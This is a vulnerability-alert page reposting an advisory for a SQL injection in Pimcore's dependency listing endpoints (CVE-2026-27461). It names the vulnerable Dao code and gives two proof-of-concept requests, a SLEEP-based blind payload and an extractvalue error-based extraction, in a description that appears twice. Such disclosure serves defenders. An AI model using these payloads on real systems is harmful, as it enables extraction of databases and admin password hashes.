Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
6.9
Pimcore: Unsecured Filter Input Allows SQL Injection
CVE-2026-27461
GHSA-vxg3-v4p6-f3fp
Summary
Pimcore's dependency listing endpoints are vulnerable to SQL injection attacks, allowing an attacker with admin access to execute malicious SQL code. This can lead to sensitive data exposure or system disruption. To protect against this, update Pimcore to fix the unsanitized filter input in the Dependency Dao RLIKE clause.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| pimcore | pimcore | <= 11.5.14.1 | – |
| pimcore | pimcore | > 12.0.0 , <= 12.3.3 | – |
Original title
Pimcore vulnerable to SQL injection via unsanitized filter value in Dependency Dao RLIKE clause
Original description
The filter query parameter in the dependency listing endpoints is JSON-decoded and the value field is concatenated directly into RLIKE clauses without sanitization or parameterized queries.
Affected code in models/Dependency/Dao.php:
- getFilterRequiresByPath() lines 90, 95, 100
- getFilterRequiredByPath() lines 148, 153, 158
All 6 locations use direct string concatenation like:
"AND LOWER(CONCAT(o.path, o.key)) RLIKE '".$value."'"
Note that $orderBy and $orderDirection in the same methods (lines 75-81) ARE properly whitelist-validated, but $value has zero sanitization.
Entry points (pimcore/admin-ui-classic-bundle ElementController.php):
- GET /admin/element/get-requires-dependencies (line 654)
- GET /admin/element/get-required-by-dependencies (line 714)
The controller JSON-decodes the filter query param and passes $filter['value'] straight to the Dao without any escaping.
PoC (time-based blind):
GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{"type":"string","value":"x' OR SLEEP(5)#"}]
If vulnerable, the response is delayed by ~15 seconds (SLEEP runs 3 times, once per UNION arm in the inner subquery).
PoC (error-based extraction):
GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{"type":"string","value":"x' OR extractvalue(1,concat(0x7e,(SELECT version())))#"}]
Returns the MySQL version string in the error response.
Requires admin authentication. An attacker with admin panel access can extract the full database including password hashes of other admin users.
Affected code in models/Dependency/Dao.php:
- getFilterRequiresByPath() lines 90, 95, 100
- getFilterRequiredByPath() lines 148, 153, 158
All 6 locations use direct string concatenation like:
"AND LOWER(CONCAT(o.path, o.key)) RLIKE '".$value."'"
Note that $orderBy and $orderDirection in the same methods (lines 75-81) ARE properly whitelist-validated, but $value has zero sanitization.
Entry points (pimcore/admin-ui-classic-bundle ElementController.php):
- GET /admin/element/get-requires-dependencies (line 654)
- GET /admin/element/get-required-by-dependencies (line 714)
The controller JSON-decodes the filter query param and passes $filter['value'] straight to the Dao without any escaping.
PoC (time-based blind):
GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{"type":"string","value":"x' OR SLEEP(5)#"}]
If vulnerable, the response is delayed by ~15 seconds (SLEEP runs 3 times, once per UNION arm in the inner subquery).
PoC (error-based extraction):
GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{"type":"string","value":"x' OR extractvalue(1,concat(0x7e,(SELECT version())))#"}]
Returns the MySQL version string in the error response.
Requires admin authentication. An attacker with admin panel access can extract the full database including password hashes of other admin users.
nvd CVSS3.1
4.9
nvd CVSS4.0
6.9
Vulnerability type
CWE-89
SQL Injection
- https://github.com/pimcore/pimcore/security/advisories/GHSA-vxg3-v4p6-f3fp Exploit Vendor Advisory
- https://nvd.nist.gov/vuln/detail/CVE-2026-27461
- https://github.com/advisories/GHSA-vxg3-v4p6-f3fp
- https://github.com/pimcore/pimcore/commit/1c3925fbec4895abeb21e5c244a83679c4e4a6... Patch
- https://github.com/pimcore/pimcore/pull/18991 Issue Tracking Patch
- https://github.com/pimcore/pimcore/releases/tag/v12.3.3 Product Release Notes
Published: 24 Feb 2026 · Updated: 12 Mar 2026 · First seen: 6 Mar 2026